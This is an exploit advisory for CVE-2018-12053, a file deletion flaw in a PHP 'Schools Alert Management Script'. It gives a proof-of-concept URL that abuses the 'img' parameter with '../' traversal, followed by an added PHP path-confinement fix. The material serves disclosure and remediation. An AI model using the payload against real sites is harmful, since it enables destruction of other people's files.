# Exploit Title: Schools Alert Management Script - Arbitrary File Deletion
# Date: 2018-06-07
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
# Category: Web Application
# Exploit Author: M3@Pandas
# Web: https://github.com/unh3x/just4cve/issues/6
# Tested on: Linux Mint
# CVE: CVE-2018-12053

# Proof of Concept:
/delete_img.php?img=./uploads/school_logos/1528_x1.php

# Notice: There is a risk of file deletion, so you had better test it in combination with a file upload vulnerability.
# Attackers can delete any file through the parameter 'img' by using '../'.
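
A path-confinement check for the 'img' parameter, shown as an added example that is not the vendor's code (the advisory does not include the source of delete_img.php). The function name resolve_inside, the UPLOAD_DIR constant and the directory layout are assumptions.

```php
<?php
// Added example, not the vendor's code.
// Assumption: deletable logos live in uploads/school_logos beside this script.
const UPLOAD_DIR = __DIR__ . '/uploads/school_logos';

/**
 * Map a client-supplied value to a regular file inside $baseDir.
 * Returns the canonical path, or null when the value must be rejected.
 */
function resolve_inside(string $baseDir, string $userPath): ?string
{
    $base = realpath($baseDir);
    if ($base === false || $userPath === '' || strpos($userPath, "\0") !== false) {
        return null;
    }
    // Honour only the file name: any directory part sent by the client,
    // including "../" sequences, is discarded.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . basename($userPath));
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // realpath() has resolved symlinks and "..", so a prefix comparison on the
    // canonical path confirms the target is still inside the upload directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

if (PHP_SAPI !== 'cli') {
    $img = $_GET['img'] ?? '';
    $target = is_string($img) ? resolve_inside(UPLOAD_DIR, $img) : null;
    if ($target === null) {
        http_response_code(400);
        exit('invalid image');
    }
    unlink($target);
}
```

Path confinement limits which files can be removed; it does not replace an authorization check on who may delete a given logo.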